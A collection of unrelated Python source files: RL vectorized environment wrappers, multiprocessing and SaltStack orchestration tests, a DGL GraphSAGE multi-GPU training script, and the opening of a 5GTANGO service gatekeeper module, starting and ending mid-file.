obs_space.shape = obs_space.shape[0]
self.keys, shapes, dtypes = obs_space_info(obs_space)
self.buf_obs = { k: np.zeros((self.num_envs,) + tuple(shapes[k]), dtype=dtypes[k]) for k in self.keys }
self.buf_dones = np.zeros((self.num_envs,), dtype=np.bool)
self.buf_rews = np.zeros((self.num_envs,), dtype=np.float32)
self.buf_infos = [{} for _ in range(self.num_envs)]
self.actions = None
def step_async(self, actions):
listify = True
try:
if len(actions) == self.num_envs:
listify = False
except TypeError:
pass
if not listify:
self.actions = actions
else:
assert self.num_envs == 1, "actions {} is either not a list or has a wrong size - cannot match to {} environments".format(actions, self.num_envs)
self.actions = [actions]
def step_wait(self):
for e in range(self.num_envs):
action = self.actions[e]
if isinstance(self.envs[e].action_space, spaces.Discrete):
action = int(action)
obs, self.buf_rews[e], self.buf_dones[e], self.buf_infos[e] = self.envs[e].step(action)
if self.buf_dones[e]:
obs = self.envs[e].reset()
self._save_obs(e, obs)
return (self._obs_from_buf(), np.copy(self.buf_rews), np.copy(self.buf_dones),
self.buf_infos.copy())
def reset(self):
for e in range(self.num_envs):
obs = self.envs[e].reset()
self._save_obs(e, obs)
return self._obs_from_buf()
def _save_obs(self, e, obs):
for k in self.keys:
if k is None:
self.buf_obs[k][e] = obs
else:
self.buf_obs[k][e] = obs[k]
def _obs_from_buf(self):
return dict_to_obs(copy_obs_dict(self.buf_obs))
def get_images(self):
return [env.render(mode='rgb_array') for env in self.envs]
def render(self, mode='human'):
if self.num_envs == 1:
self.envs[0].render(mode=mode)
else:
super().render(mode=mode)
class SubprocVecEnv(VecEnv):
"""
Creates a multiprocess vectorized wrapper for multiple environments, distributing each environment to its own
process, allowing significant speed up when the environment is computationally complex.
For performance reasons, if your environment is not IO bound, the number of environments should not exceed the
number of logical cores on your CPU.
.. warning::
Only 'forkserver' and 'spawn' start methods are thread-safe,
which is important when TensorFlow sessions or other non thread-safe
libraries are used in the parent (see issue #217). However, compared to
'fork' they incur a small start-up cost and have restrictions on
global variables. With those methods, users must wrap the code in an
``if __name__ == "__main__":`` block.
For more information, see the multiprocessing documentation.
:param env_fns: ([callable]) A list of functions that will create the environments
(each callable returns a `Gym.Env` instance when called).
:param start_method: (str) method used to start the subprocesses.
Must be one of the methods returned by multiprocessing.get_all_start_methods().
Defaults to 'forkserver' on available platforms, and 'spawn' otherwise.
"""
def __init__(self, env_fns, start_method=None):
self.waiting = False
self.closed = False
self.n_envs = len(env_fns)
n_envs = len(env_fns)
if start_method is None:
# Fork is not a thread safe method (see issue #217)
# but is more user friendly (does not require to wrap the code in
# a `if __name__ == "__main__":`)
forkserver_available = 'forkserver' in multiprocessing.get_all_start_methods()
start_method = 'forkserver' if forkserver_available else 'spawn'
ctx = multiprocessing.get_context(start_method)
self.remotes, self.work_remotes = zip(*[ctx.Pipe(duplex=True) for _ in range(n_envs)])
self.processes = []
for work_remote, remote, env_fn in zip(self.work_remotes, self.remotes, env_fns):
args = (work_remote, remote, CloudpickleWrapper(env_fn))
# daemon=True: if the main process crashes, we should not cause things to hang
process = ctx.Process(target=_worker, args=args, daemon=True) # pytype:disable=attribute-error
process.start()
self.processes.append(process)
work_remote.close()
self.remotes[0].send(('get_spaces', None))
observation_space, action_space = self.remotes[0].recv()
VecEnv.__init__(self, len(env_fns), observation_space, action_space)
def step_async(self, actions):
for remote, action in zip(self.remotes, actions):
remote.send(('step', action))
self.waiting = True
def step_wait(self):
results = [remote.recv() for remote in self.remotes]
self.waiting = False
obs, rews, dones, infos = zip(*results)
return _flatten_obs(obs, self.observation_space), np.stack(rews), np.stack(dones), infos
def seed(self, seed=None):
for idx, remote in enumerate(self.remotes):
remote.send(('seed', seed + idx))
return [remote.recv() for remote in self.remotes]
def reset(self):
for remote in self.remotes:
remote.send(('reset', None))
obs = [remote.recv() for remote in self.remotes]
return _flatten_obs(obs, self.observation_space)
def close(self):
if self.closed:
return
if self.waiting:
for remote in self.remotes:
remote.recv()
for remote in self.remotes:
remote.send(('close', None))
for process in self.processes:
process.join()
self.closed = True
def get_images(self, *args, **kwargs):
for pipe in self.remotes:
# gather images from subprocesses
# `mode` will be taken into account later
pipe.send(('render', (args, {'mode': 'rgb_array', **kwargs})))
imgs = [pipe.recv() for pipe in self.remotes]
return imgs
def get_attr(self, attr_name, indices=None):
"""Return attribute from vectorized environment (see base class)."""
target_remotes = self._get_target_remotes(indices)
for remote in target_remotes:
remote.send(('get_attr', attr_name))
return [remote.recv() for remote in target_remotes]
def set_attr(self, attr_name, value, indices=None):
"""Set attribute inside vectorized environments (see base class)."""
target_remotes = self._get_target_remotes(indices)
for remote in target_remotes:
remote.send(('set_attr', (attr_name, value)))
for remote in target_remotes:
remote.recv()
def env_method(self, method_name, *method_args, indices=None, **method_kwargs):
"""Call instance methods of vectorized environments."""
target_remotes = self._get_target_remotes(indices)
for remote in target_remotes:
remote.send(('env_method', (method_name, method_args, method_kwargs)))
return [remote.recv() for remote in target_remotes]
def _get_target_remotes(self, indices):
"""
Get the connection object needed to communicate with the wanted
envs that are in subprocesses.
:param indices: (None,int,Iterable) refers to indices of envs.
:return: ([multiprocessing.Connection]) Connection object to communicate between processes.
"""
indices = self._get_indices(indices)
return [self.remotes[i] for i in indices]
### HELPER CLASSES / FNS
def _worker(remote, parent_remote, env_fn_wrapper):
parent_remote.close()
env = env_fn_wrapper.var()
while True:
try:
cmd, data = remote.recv()
if cmd == 'step':
observation, reward, done, info = env.step(data)
if done:
# save final observation where user can get it, then reset
info['terminal_observation'] = observation
observation = env.reset()
remote.send((observation, reward, done, info))
elif cmd == 'seed':
remote.send(env.seed(data))
elif cmd == 'reset':
observation = env.reset()
remote.send(observation)
elif cmd == 'render':
remote.send(env.render(*data[0], **data[1]))
elif cmd == 'close':
remote.close()
break
elif cmd == 'get_spaces':
remote.send((env.observation_space, env.action_space))
elif cmd == 'env_method':
method = getattr(env, data[0])
remote.send(method(*data[1], **data[2]))
elif cmd == 'get_attr':
remote.send(getattr(env, data))
elif cmd == 'set_attr':
remote.send(setattr(env, data[0], data[1]))
else:
raise NotImplementedError
except EOFError:
break
class CloudpickleWrapper(object):
def __init__(self, var):
"""
Uses cloudpickle to serialize contents (otherwise multiprocessing tries to use pickle)
:param var: (Any) the variable you wish to wrap for pickling with cloudpickle
"""
self.var = var
def __getstate__(self):
return cloudpickle.dumps(self.var)
def __setstate__(self, obs):
self.var = pickle.loads(obs)
def copy_obs_dict(obs):
"""
Deep-copy an observation dict.
"""
return {k: np.copy(v) for k, v in obs.items()}
def dict_to_obs(obs_dict):
"""
Convert an observation dict into a raw array if the
original observation space was not a Dict space.
"""
if set(obs_dict.keys()) == {None}:
return obs_dict[None]
return obs_dict
def obs_space_info(obs_space):
"""
Get dict-structured information about a gym.Space.
Returns:
A tuple (keys, shapes, dtypes):
keys: a list of dict keys.
shapes: a dict mapping keys to shapes.
dtypes: a dict mapping keys to dtypes.
"""
if isinstance(obs_space, gym.spaces.Dict):
assert isinstance(obs_space.spaces, OrderedDict)
subspaces = obs_space.spaces
else:
subspaces = {None: obs_space}
keys = []
shapes = {}
dtypes = {}
for key, box in subspaces.items():
keys.append(key)
shapes[key] = box.shape
dtypes[key] = box.dtype
return keys, shapes, dtypes
def obs_to_dict(obs):
"""
Convert an observation into a dict.
"""
if isinstance(obs, dict):
return obs
return {None: obs}
def _flatten_obs(obs, space):
"""
Flatten observations, depending on the observation space.
:param obs: (list<X> or tuple<X> where X is dict<ndarray>, tuple<ndarray> or ndarray) observations.
A list or tuple of observations, one per environment.
Each environment observation may be a NumPy array, or a dict or tuple of NumPy arrays.
:return (OrderedDict<ndarray>, tuple<ndarray> or ndarray) flattened observations.
A flattened NumPy array or an OrderedDict or tuple of flattened numpy arrays.
Each NumPy array has the environment index as its first axis.
"""
assert isinstance(obs, (list, tuple)), "expected list or tuple of observations per environment"
assert len(obs) > 0, "need observations from at least one environment"
if isinstance(space, gym.spaces.Dict):
assert isinstance(space.spaces, OrderedDict), "Dict space must have ordered subspaces"
assert isinstance(obs[0], dict), "non-dict observation for environment with Dict observation space"
return OrderedDict([(k, np.stack([o[k] for o in obs])) for k in space.spaces.keys()])
elif isinstance(space, gym.spaces.Tuple):
assert isinstance(obs[0], tuple), "non-tuple observation for environment with Tuple observation space"
obs_len = len(space.spaces)
return tuple((np.stack([o[i] for o in obs]) for i in range(obs_len)))
else:
return np.stack(obs)
|
test_mputil.py
|
import multiprocessing
import time
import pytest
from itertools import product
from astropy.io import fits
from astropy.utils.data import get_pkg_data_filename
from stsci.tools.mputil import launch_and_wait, best_tile_layout
SUPPORTED_START_METHODS = []
for sm in ['spawn', 'fork', 'forkserver']:
try:
multiprocessing.get_context(sm)
SUPPORTED_START_METHODS.append(sm)
except ValueError:
pass
def takes_time(x, img):
"""Example function which takes some time to run."""
time.sleep(0.001) # 1 ms is long by computer standards?
@pytest.mark.parametrize('fname, method', (
x for x in product([None, 'data/o4sp040b0_raw.fits'],
SUPPORTED_START_METHODS)
))
def test_launch_and_wait(fname, method):
"""Illustrate use of launch_and_wait"""
p = None
subprocs = []
# Passing fits.HDUList in Python 3.8 would cause crash due to spawn start
# method:
#
if fname is None:
img = None
else:
img = fits.open(get_pkg_data_filename(fname))
for item in range(2, 5):
mp_ctx = multiprocessing.get_context(method)
p = mp_ctx.Process(target=takes_time, args=(item, img),
name='takes_time()')
subprocs.append(p)
if method != 'fork' and fname:
with pytest.raises(TypeError):
# launch em, pool-fashion
launch_and_wait(subprocs, 3)
else:
launch_and_wait(subprocs, 3)
if img:
img.close()
def test_best_tile_layout():
"""Loop though some numbers and make sure we get expected results."""
for i in range(257):
x, y = best_tile_layout(i)
assert (x * y <= i) or (i == 0), \
"Total num resulting tiles > pool_size"
unused_cores = i - (x * y)
# print(i, (x,y), unused_cores)
if i < 10:
assert unused_cores <= 1, "Too many idle cores at i = " + str(i)
else:
percent_unused = 100. * ((unused_cores * 1.) / i)
assert percent_unused < 14., "Too many idles cores at i: " + str(i)
|
state.py
|
# -*- coding: utf-8 -*-
'''
Tests for the state runner
'''
# Import Python Libs
from __future__ import absolute_import
import errno
import os
import shutil
import signal
import tempfile
import textwrap
import yaml
import threading
from salt.ext.six.moves import queue
# Import Salt Testing Libs
from salttesting import skipIf
from salttesting.helpers import ensure_in_syspath
ensure_in_syspath('../../')
import integration
# Import Salt Libs
import salt.utils
import salt.utils.event
class StateRunnerTest(integration.ShellCase):
'''
Test the state runner.
'''
def add_to_queue(self, q, cmd):
'''
helper method to add salt-run
return data to a queue
'''
ret = self.run_run(cmd)
q.put(ret)
q.task_done()
def test_orchestrate_output(self):
'''
Ensure the orchestrate runner outputs useful state data.
In Issue #31330, the output only contains ['outputter:', ' highstate'],
and not the full stateful return. This tests ensures we don't regress in that
manner again.
Also test against some sample "good" output that would be included in a correct
orchestrate run.
'''
#ret_output = self.run_run_plus('state.orchestrate', 'orch.simple')['out']
ret_output = self.run_run('state.orchestrate orch.simple')
bad_out = ['outputter:', ' highstate']
good_out = [' Function: salt.state',
' Result: True',
'Succeeded: 1 (changed=1)',
'Failed: 0',
'Total states run: 1']
# First, check that we don't have the "bad" output that was displaying in
# Issue #31330 where only the highstate outputter was listed
self.assertIsNot(bad_out, ret_output)
# Now test that some expected good sample output is present in the return.
for item in good_out:
self.assertIn(item, ret_output)
def test_orchestrate_nested(self):
'''
test salt-run state.orchestrate and failhard with nested orchestration
'''
if os.path.exists('/tmp/ewu-2016-12-13'):
os.remove('/tmp/ewu-2016-12-13')
_, code = self.run_run(
'state.orchestrate nested-orch.outer',
with_retcode=True)
self.assertFalse(os.path.exists('/tmp/ewu-2016-12-13'))
self.assertNotEqual(code, 0)
def test_state_event(self):
'''
test to ensure state.event
runner returns correct data
'''
q = queue.Queue(maxsize=0)
cmd = 'state.event salt/job/*/new count=1'
expect = '"minions": ["minion"]'
server_thread = threading.Thread(target=self.add_to_queue, args=(q, cmd))
server_thread.setDaemon(True)
server_thread.start()
while q.empty():
self.run_salt('minion test.ping --static')
out = q.get()
self.assertIn(expect, str(out))
server_thread.join()
@skipIf(salt.utils.is_windows(), '*NIX-only test')
class OrchEventTest(integration.ShellCase):
'''
Tests for orchestration events
'''
def setUp(self):
self.timeout = 60
self.master_d_dir = os.path.join(self.get_config_dir(), 'master.d')
try:
os.makedirs(self.master_d_dir)
except OSError as exc:
if exc.errno != errno.EEXIST:
raise
self.conf = tempfile.NamedTemporaryFile(
mode='w',
suffix='.conf',
dir=self.master_d_dir,
delete=True,
)
self.base_env = tempfile.mkdtemp(dir=integration.TMP)
def tearDown(self):
shutil.rmtree(self.base_env)
self.conf.close()
# Force a reload of the configuration now that our temp config file has
# been removed.
self.run_run_plus('test.arg', __reload_config=True)
def alarm_handler(self, signal, frame):
raise Exception('Timeout of {0} seconds reached'.format(self.timeout))
def write_conf(self, data):
'''
Dump the config dict to the conf file
'''
self.conf.write(yaml.dump(data, default_flow_style=False))
self.conf.flush()
def test_jid_in_ret_event(self):
'''
Test to confirm that the ret event for the orchestration contains the
jid for the jobs spawned.
'''
self.write_conf({
'fileserver_backend': ['roots'],
'file_roots': {
'base': [self.base_env],
},
})
state_sls = os.path.join(self.base_env, 'test_state.sls')
with salt.utils.fopen(state_sls, 'w') as fp_:
fp_.write(textwrap.dedent('''
date:
cmd.run
'''))
orch_sls = os.path.join(self.base_env, 'test_orch.sls')
with salt.utils.fopen(orch_sls, 'w') as fp_:
fp_.write(textwrap.dedent('''
date_cmd:
salt.state:
- tgt: minion
- sls: test_state
ping_minion:
salt.function:
- name: test.ping
- tgt: minion
fileserver.file_list:
salt.runner
config.values:
salt.wheel
'''))
listener = salt.utils.event.get_event(
'master',
sock_dir=self.master_opts['sock_dir'],
transport=self.master_opts['transport'],
opts=self.master_opts)
jid = self.run_run_plus(
'state.orchestrate',
'test_orch',
__reload_config=True).get('jid')
if jid is None:
raise Exception('jid missing from run_run_plus output')
signal.signal(signal.SIGALRM, self.alarm_handler)
signal.alarm(self.timeout)
try:
while True:
event = listener.get_event(full=True)
if event is None:
continue
if event['tag'] == 'salt/run/{0}/ret'.format(jid):
# Don't wrap this in a try/except. We want to know if the
# data structure is different from what we expect!
ret = event['data']['return']['data']['master']
for job in ret:
self.assertTrue('__jid__' in ret[job])
break
finally:
signal.alarm(0)
if __name__ == '__main__':
from integration import run_tests
run_tests(StateRunnerTest)
run_tests(OrchEventTest)
|
train_cv_multi_gpu.py
|
import dgl
import numpy as np
import torch as th
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
import torch.multiprocessing as mp
import dgl.function as fn
import dgl.nn.pytorch as dglnn
import time
import argparse
import tqdm
import traceback
import math
from _thread import start_new_thread
from functools import wraps
from dgl.data import RedditDataset
from torch.utils.data import DataLoader
from torch.nn.parallel import DistributedDataParallel
class SAGEConvWithCV(nn.Module):
def __init__(self, in_feats, out_feats, activation):
super().__init__()
self.W = nn.Linear(in_feats * 2, out_feats)
self.activation = activation
self.reset_parameters()
def reset_parameters(self):
gain = nn.init.calculate_gain('relu')
nn.init.xavier_uniform_(self.W.weight, gain=gain)
nn.init.constant_(self.W.bias, 0)
def forward(self, block, H, HBar=None):
if self.training:
with block.local_scope():
H_src, H_dst = H
HBar_src, agg_HBar_dst = HBar
block.dstdata['agg_hbar'] = agg_HBar_dst
block.srcdata['hdelta'] = H_src - HBar_src
block.update_all(fn.copy_u('hdelta', 'm'), fn.mean('m', 'hdelta_new'))
h_neigh = block.dstdata['agg_hbar'] + block.dstdata['hdelta_new']
h = self.W(th.cat([H_dst, h_neigh], 1))
if self.activation is not None:
h = self.activation(h)
return h
else:
with block.local_scope():
H_src, H_dst = H
block.srcdata['h'] = H_src
block.update_all(fn.copy_u('h', 'm'), fn.mean('m', 'h_new'))
h_neigh = block.dstdata['h_new']
h = self.W(th.cat([H_dst, h_neigh], 1))
if self.activation is not None:
h = self.activation(h)
return h
class SAGE(nn.Module):
def __init__(self,
in_feats,
n_hidden,
n_classes,
n_layers,
activation):
super().__init__()
self.n_layers = n_layers
self.n_hidden = n_hidden
self.n_classes = n_classes
self.layers = nn.ModuleList()
self.layers.append(SAGEConvWithCV(in_feats, n_hidden, activation))
for i in range(1, n_layers - 1):
self.layers.append(SAGEConvWithCV(n_hidden, n_hidden, activation))
self.layers.append(SAGEConvWithCV(n_hidden, n_classes, None))
def forward(self, blocks):
h = blocks[0].srcdata['features']
updates = []
for layer, block in zip(self.layers, blocks):
# We need to first copy the representation of nodes on the RHS from the
# appropriate nodes on the LHS.
# Note that the shape of h is (num_nodes_LHS, D) and the shape of h_dst
# would be (num_nodes_RHS, D)
h_dst = h[:block.number_of_dst_nodes()]
hbar_src = block.srcdata['hist']
agg_hbar_dst = block.dstdata['agg_hist']
# Then we compute the updated representation on the RHS.
# The shape of h now becomes (num_nodes_RHS, D)
h = layer(block, (h, h_dst), (hbar_src, agg_hbar_dst))
block.dstdata['h_new'] = h
return h
def inference(self, g, x, batch_size, device):
"""
Inference with the GraphSAGE model on full neighbors (i.e. without neighbor sampling).
g : the entire graph.
x : the input of entire node set.
The inference code is written in a fashion that it could handle any number of nodes and
layers.
"""
# During inference with sampling, multi-layer blocks are very inefficient because
# lots of computations in the first few layers are repeated.
# Therefore, we compute the representation of all nodes layer by layer. The nodes
# on each layer are of course splitted in batches.
# TODO: can we standardize this?
nodes = th.arange(g.number_of_nodes())
for l, layer in enumerate(self.layers):
y = g.ndata['hist_%d' % (l + 1)]
for start in tqdm.trange(0, len(nodes), batch_size):
end = start + batch_size
batch_nodes = nodes[start:end]
block = dgl.to_block(dgl.in_subgraph(g, batch_nodes), batch_nodes)
induced_nodes = block.srcdata[dgl.NID]
h = x[induced_nodes].to(device)
block = block.to(device)
h_dst = h[:block.number_of_dst_nodes()]
h = layer(block, (h, h_dst))
y[start:end] = h.cpu()
x = y
return y
class NeighborSampler(object):
def __init__(self, g, fanouts):
self.g = g
self.fanouts = fanouts
def sample_blocks(self, seeds):
seeds = th.LongTensor(seeds)
blocks = []
hist_blocks = []
for fanout in self.fanouts:
# For each seed node, sample ``fanout`` neighbors.
frontier = dgl.sampling.sample_neighbors(self.g, seeds, fanout)
# For history aggregation we sample all neighbors.
hist_frontier = dgl.in_subgraph(self.g, seeds)
# Then we compact the frontier into a bipartite graph for message passing.
block = dgl.to_block(frontier, seeds)
hist_block = dgl.to_block(hist_frontier, seeds)
# Obtain the seed nodes for next layer.
seeds = block.srcdata[dgl.NID]
blocks.insert(0, block)
hist_blocks.insert(0, hist_block)
return blocks, hist_blocks
# According to https://github.com/pytorch/pytorch/issues/17199, this decorator
# is necessary to make fork() and openmp work together.
#
# TODO: confirm if this is necessary for MXNet and Tensorflow. If so, we need
# to standardize worker process creation since our operators are implemented with
# OpenMP.
def thread_wrapped_func(func):
@wraps(func)
def decorated_function(*args, **kwargs):
queue = mp.Queue()
def _queue_result():
exception, trace, res = None, None, None
try:
res = func(*args, **kwargs)
except Exception as e:
exception = e
trace = traceback.format_exc()
queue.put((res, exception, trace))
start_new_thread(_queue_result, ())
result, exception, trace = queue.get()
if exception is None:
return result
else:
assert isinstance(exception, Exception)
raise exception.__class__(trace)
return decorated_function
def compute_acc(pred, labels):
"""
Compute the accuracy of prediction given the labels.
"""
return (th.argmax(pred, dim=1) == labels).float().sum() / len(pred)
def evaluate(model, g, labels, val_mask, batch_size, device):
"""
Evaluate the model on the validation set specified by ``val_mask``.
g : The entire graph.
inputs : The features of all the nodes.
labels : The labels of all the nodes.
val_mask : A 0-1 mask indicating which nodes do we actually compute the accuracy for.
batch_size : Number of nodes to compute at the same time.
device : The GPU device to evaluate on.
"""
model.eval()
with th.no_grad():
inputs = g.ndata['features']
pred = model.inference(g, inputs, batch_size, device) # also recomputes history tensors
model.train()
return compute_acc(pred[val_mask], labels[val_mask])
def load_subtensor(g, labels, blocks, hist_blocks, dev_id, aggregation_on_device=False):
"""
Copys features and labels of a set of nodes onto GPU.
"""
blocks[0].srcdata['features'] = g.ndata['features'][blocks[0].srcdata[dgl.NID]]
blocks[-1].dstdata['label'] = labels[blocks[-1].dstdata[dgl.NID]]
ret_blocks = []
ret_hist_blocks = []
for i, (block, hist_block) in enumerate(zip(blocks, hist_blocks)):
hist_col = 'features' if i == 0 else 'hist_%d' % i
block.srcdata['hist'] = g.ndata[hist_col][block.srcdata[dgl.NID]]
# Aggregate history
hist_block.srcdata['hist'] = g.ndata[hist_col][hist_block.srcdata[dgl.NID]]
if aggregation_on_device:
hist_block = hist_block.to(dev_id)
hist_block.srcdata['hist'] = hist_block.srcdata['hist']
hist_block.update_all(fn.copy_u('hist', 'm'), fn.mean('m', 'agg_hist'))
block = block.to(dev_id)
if not aggregation_on_device:
hist_block = hist_block.to(dev_id)
block.dstdata['agg_hist'] = hist_block.dstdata['agg_hist']
ret_blocks.append(block)
ret_hist_blocks.append(hist_block)
return ret_blocks, ret_hist_blocks
def create_history_storage(g, args, n_classes):
# Initialize history storage
for l in range(args.num_layers):
dim = args.num_hidden if l != args.num_layers - 1 else n_classes
g.ndata['hist_%d' % (l + 1)] = th.zeros(g.number_of_nodes(), dim).share_memory_()
def init_history(g, model, dev_id, batch_size):
with th.no_grad():
model.inference(g, g.ndata['features'], batch_size, dev_id) # replaces hist_i features in-place
def update_history(g, blocks):
with th.no_grad():
for i, block in enumerate(blocks):
ids = block.dstdata[dgl.NID].cpu()
hist_col = 'hist_%d' % (i + 1)
h_new = block.dstdata['h_new'].cpu()
g.ndata[hist_col][ids] = h_new
@thread_wrapped_func
def run(proc_id, n_gpus, args, devices, data):
dropout = 0.2
dev_id = devices[proc_id]
if n_gpus > 1:
dist_init_method = 'tcp://{master_ip}:{master_port}'.format(
master_ip='127.0.0.1', master_port='12345')
world_size = n_gpus
th.distributed.init_process_group(backend="nccl",
init_method=dist_init_method,
world_size=world_size,
rank=proc_id)
th.cuda.set_device(dev_id)
# Unpack data
train_mask, val_mask, in_feats, labels, n_classes, g = data
train_nid = train_mask.nonzero().squeeze()
val_nid = val_mask.nonzero().squeeze()
# Split train_nid
train_nid = th.split(train_nid, math.ceil(len(train_nid) // n_gpus))[proc_id]
# Create sampler
sampler = NeighborSampler(g, [int(_) for _ in args.fan_out.split(',')])
# Create PyTorch DataLoader for constructing blocks
dataloader = DataLoader(
dataset=train_nid.numpy(),
batch_size=args.batch_size,
collate_fn=sampler.sample_blocks,
shuffle=True,
drop_last=False,
num_workers=args.num_workers_per_gpu)
# Define model
model = SAGE(in_feats, args.num_hidden, n_classes, args.num_layers, F.relu)
# Move the model to GPU and define optimizer
model = model.to(dev_id)
if n_gpus > 1:
model = DistributedDataParallel(model, device_ids=[dev_id], output_device=dev_id)
loss_fcn = nn.CrossEntropyLoss()
loss_fcn = loss_fcn.to(dev_id)
optimizer = optim.Adam(model.parameters(), lr=args.lr)
# Compute history tensor and their aggregation before training on CPU
model.eval()
if n_gpus > 1:
if proc_id == 0:
init_history(g, model.module, dev_id, args.val_batch_size)
th.distributed.barrier()
else:
init_history(g, model, dev_id, args.val_batch_size)
model.train()
# Training loop
avg = 0
iter_tput = []
for epoch in range(args.num_epochs):
tic = time.time()
model.train()
for step, (blocks, hist_blocks) in enumerate(dataloader):
if proc_id == 0:
tic_step = time.time()
# The nodes for input lies at the LHS side of the first block.
# The nodes for output lies at the RHS side of the last block.
seeds = blocks[-1].dstdata[dgl.NID]
blocks, hist_blocks = load_subtensor(g, labels, blocks, hist_blocks, dev_id, True)
# forward
batch_pred = model(blocks)
# update history
update_history(g, blocks)
# compute loss
batch_labels = blocks[-1].dstdata['label']
loss = loss_fcn(batch_pred, batch_labels)
# backward
optimizer.zero_grad()
loss.backward()
optimizer.step()
if proc_id == 0:
iter_tput.append(len(seeds) * n_gpus / (time.time() - tic_step))
if step % args.log_every == 0 and proc_id == 0:
acc = compute_acc(batch_pred, batch_labels)
print('Epoch {:05d} | Step {:05d} | Loss {:.4f} | Train Acc {:.4f} | Speed (samples/sec) {:.4f}'.format(
epoch, step, loss.item(), acc.item(), np.mean(iter_tput[3:])))
if n_gpus > 1:
th.distributed.barrier()
toc = time.time()
if proc_id == 0:
print('Epoch Time(s): {:.4f}'.format(toc - tic))
if epoch >= 5:
avg += toc - tic
if epoch % args.eval_every == 0 and epoch != 0:
model.eval()
eval_acc = evaluate(
model if n_gpus == 1 else model.module, g, labels, val_nid, args.val_batch_size, dev_id)
print('Eval Acc {:.4f}'.format(eval_acc))
if n_gpus > 1:
th.distributed.barrier()
if proc_id == 0:
print('Avg epoch time: {}'.format(avg / (epoch - 4)))
if __name__ == '__main__':
argparser = argparse.ArgumentParser("multi-gpu training")
argparser.add_argument('--gpu', type=str, default='0')
argparser.add_argument('--num-epochs', type=int, default=20)
argparser.add_argument('--num-hidden', type=int, default=16)
argparser.add_argument('--num-layers', type=int, default=2)
argparser.add_argument('--fan-out', type=str, default='1,1')
argparser.add_argument('--batch-size', type=int, default=1000)
argparser.add_argument('--val-batch-size', type=int, default=1000)
argparser.add_argument('--log-every', type=int, default=20)
argparser.add_argument('--eval-every', type=int, default=5)
argparser.add_argument('--lr', type=float, default=0.003)
argparser.add_argument('--num-workers-per-gpu', type=int, default=0)
args = argparser.parse_args()
devices = list(map(int, args.gpu.split(',')))
n_gpus = len(devices)
# load reddit data
data = RedditDataset(self_loop=True)
n_classes = data.num_classes
g = data[0]
features = g.ndata['feat']
in_feats = features.shape[1]
labels = g.ndata['label']
train_mask = g.ndata['train_mask']
val_mask = g.ndata['val_mask']
g.ndata['features'] = features.share_memory_()
create_history_storage(g, args, n_classes)
g.create_format_()
# Pack data
data = train_mask, val_mask, in_feats, labels, n_classes, g
if n_gpus == 1:
run(0, n_gpus, args, devices, data)
else:
procs = []
for proc_id in range(n_gpus):
p = mp.Process(target=run, args=(proc_id, n_gpus, args, devices, data))
p.start()
procs.append(p)
for p in procs:
p.join()
|
llcm.py
|
# Copyright (c) 2018 SONATA-NFV, 5GTANGO and Paderborn University
# ALL RIGHTS RESERVED.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Neither the name of the SONATA-NFV, 5GTANGO, Paderborn University
# nor the names of its contributors may be used to endorse or promote
# products derived from this software without specific prior written
# permission.
#
# This work has been performed in the framework of the SONATA project,
# funded by the European Commission under Grant number 671517 through
# the Horizon 2020 and 5G-PPP programmes. The authors would like to
# acknowledge the contributions of their colleagues of the SONATA
# partner consortium (www.sonata-nfv.eu).
#
# This work has also been performed in the framework of the 5GTANGO project,
# funded by the European Commission under Grant number 761493 through
# the Horizon 2020 and 5G-PPP programmes. The authors would like to
# acknowledge the contributions of their colleagues of the 5GTANGO
# partner consortium (www.5gtango.eu).
import logging
import os
import uuid
import hashlib
import zipfile
import yaml
import threading
import datetime
from docker import DockerClient
from flask import Flask, request
import flask_restful as fr
from gevent.pywsgi import WSGIServer
from subprocess import Popen
import ipaddress
import copy
import time
LOG = logging.getLogger("5gtango.llcm")
LOG.setLevel(logging.INFO)
CORS_HEADER = {'Access-Control-Allow-Origin': '*',
'Access-Control-Allow-Methods': 'GET,OPTIONS'}
GK_STORAGE = "/tmp/vim-emu-tango-llcm/"
UPLOAD_FOLDER = os.path.join(GK_STORAGE, "uploads/")
CATALOG_FOLDER = os.path.join(GK_STORAGE, "catalog/")
# Enable Dockerfile build functionality
BUILD_DOCKERFILE = False
# flag to indicate that we run without the emulator (only the bare API for
# integration testing)
GK_STANDALONE_MODE = False
# should a new version of an image be pulled even if its available
FORCE_PULL = False
# flag to indicate if we use bidirectional forwarding rules in the
# automatic chaining process
BIDIRECTIONAL_CHAIN = True
# override the management interfaces in the descriptors with default
# docker0 interfaces in the containers
USE_DOCKER_MGMT = False
# automatically deploy uploaded packages (no need to execute son-access
# deploy --latest separately)
AUTO_DEPLOY = False
# and also automatically terminate any other running services
AUTO_DELETE = False
# global subnet definitions (see reset_subnets())
ELAN_SUBNETS = None
ELINE_SUBNETS = None
# Time in seconds to wait for vnf stop scripts to execute fully
VNF_STOP_WAIT_TIME = 5
# If services are instantiated multiple times, the public port
# mappings need to be adapted to avoid colisions. We use this
# offset for this: NEW_PORT (SSIID * OFFSET) + ORIGINAL_PORT
MULTI_INSTANCE_PORT_OFFSET = 1000
# Selected Placement Algorithm: Points to the class of the selected
# placement algorithm.
PLACEMENT_ALGORITHM_OBJ = None
# Path to folder with <container_name>.env.yml files that contain
# environment variables injected into the specific container
# when it is started.
PER_INSTANCE_ENV_CONFIGURATION_FOLDER = None
class OnBoardingException(BaseException):
pass
class Gatekeeper(object):
def __init__(self):
self.services = dict()
self.dcs = dict()
self.net = None
# used to generate short names for VNFs (Mininet limitation)
self.vnf_counter = 0
reset_subnets()
LOG.info("Initialized 5GTANGO LLCM module.")
def register_service_package(self, service_uuid, service):
"""
register new service package
:param service_uuid
:param service object
"""
self.services[service_uuid] = service
# lets perform all steps needed to onboard the service
service.onboard()
class Service(object):
"""
This class represents a NS uploaded as a *.son package to the
dummy gatekeeper.
Can have multiple running instances of this service.
"""
def __init__(self,
service_uuid,
package_file_hash,
package_file_path):
self.uuid = service_uuid
self.package_file_hash = package_file_hash
self.package_file_path = package_file_path
self.package_content_path = os.path.join(
CATALOG_FOLDER, "services/%s" % self.uuid)
self.manifest = None
self.nsd = None
self.vnfds = dict()
self.local_docker_files = dict()
self.remote_docker_image_urls = dict()
self.instances = dict()
self._instance_counter = 0
self.created_at = str(datetime.datetime.now())
def onboard(self):
"""
